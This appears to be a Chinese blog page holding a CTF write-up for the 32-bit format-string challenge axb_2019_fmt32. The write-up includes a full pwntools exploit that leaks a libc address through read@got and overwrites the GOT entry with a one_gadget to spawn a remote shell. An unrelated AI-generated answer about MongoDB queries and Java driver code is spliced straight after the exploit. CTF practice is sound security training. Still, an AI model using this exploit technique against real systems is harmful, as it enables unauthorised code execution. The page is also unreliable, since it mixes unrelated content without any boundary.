axb_2019_fmt32

本文介绍了如何通过checksec和IDA分析一个32位程序,发现栈不可执行和格式化字符串漏洞。利用这些信息,通过构造payload泄露libc地址,并使用one_gadget找到执行shell的地址,最终实现远程控制。实验中涉及了read@got和printf@got的覆盖,以及交互式shell的获取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

axb_2019_fmt32

使用checksec查看:
在这里插入图片描述
只开启了栈不可执行,看题目名像是格式化字符串的题目。

放进IDA中查看:
在这里插入图片描述
存在格式化字符串,直接运行测试。
在这里插入图片描述
可以看到,在第七位、第八位均有我们输入的参数。

说明这题的栈是没有对齐的,写payload的时候需要注意。

然而…这道题并没有后门函数直接写入got表,所以需要先泄露出libc地址

再用one_gadget去getshell,可以覆盖read@got或者printf@got

exp:

from pwn import *

#start
# p = process("../buu/axb_2019_fmt32")
p = remote("node4.buuoj.cn","29394")
elf = ELF("../buu/axb_2019_fmt32")
libc = ELF("../buu/ubuntu16(32).so")

#params
read_got = elf.got['read']

#attack
payload = b'a' + p32(read_got) + b'%8$s'
p.sendafter('me:', payload)
read_addr = u32(p.recv(18)[-4:])

#libc
libc_base = read_addr - libc.symbols['read']
one_gadget = libc_base + 0x3a80c

#attack2
payload = b'a' + fmtstr_payload(8, {read_got: one_gadget},write_size = "byte",numbwritten = 0xa)
p.sendafter('me:', payload)
p.sendline("cat flag")

p.interactive()
### 将JSON结构转换为MongoDB查询语句 要将给定的JSON结构转换为MongoDB查询语句,可以按照以下方式构建查询: #### 查询语句 假设集合名称为 `AXB_MTWM_CALL_FINISH_RECORD_INFO`,查询条件如下所示: ```javascript { "result": "0", "baselineTime": { "$gte": ISODate("2025-01-28T00:00:00Z"), "$lt": ISODate("2025-01-29T00:00:00Z") } } ``` 完整的MongoDB查询语句可以通过 `db.collection.find()` 方法实现: ```javascript db.AXB_MTWM_CALL_FINISH_RECORD_INFO.find({ "result": "0", "baselineTime": { "$gte": ISODate("2025-01-28T00:00:00Z"), "$lt": ISODate("2025-01-29T00:00:00Z") } }); ``` 此查询表示筛选出集合 `AXB_MTWM_CALL_FINISH_RECORD_INFO` 中满足以下两个条件的文档: 1. 字段 `result` 的值等于 `"0"`[^1]。 2. 字段 `baselineTime` 的值大于或等于 `ISODate("2025-01-28T00:00:00Z")` 并小于 `ISODate("2025-01-29T00:00:00Z")`[^2]。 如果需要进一步优化性能,可以在 `result` 和 `baselineTime` 上创建复合索引来加速查询操作。例如: ```javascript db.AXB_MTWM_CALL_FINISH_RECORD_INFO.createIndex({ result: 1, baselineTime: 1 }); ``` 这一步骤有助于提高查询效率,尤其是在处理大规模数据集时[^3]。 #### Java 实现示例 以下是基于 Java 驱动程序执行上述查询的一个示例代码片段: ```java import com.mongodb.client.MongoClients; import com.mongodb.client.MongoCollection; import com.mongodb.client.MongoDatabase; import org.bson.Document; public class MongoDBQueryExample { public static void main(String[] args) { try (var mongoClient = MongoClients.create("mongodb://localhost:27017")) { var database = mongoClient.getDatabase("your_database_name"); var collection = database.getCollection("AXB_MTWM_CALL_FINISH_RECORD_INFO"); Document query = new Document("result", "0") .append("baselineTime", new Document("$gte", java.time.Instant.parse("2025-01-28T00:00:00Z")) .append("$lt", java.time.Instant.parse("2025-01-29T00:00:00Z"))); collection.find(query).forEach(doc -> System.out.println(doc.toJson())); } } } ``` 这段代码展示了如何通过 Java API 构建并运行指定的查询逻辑[^4]。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值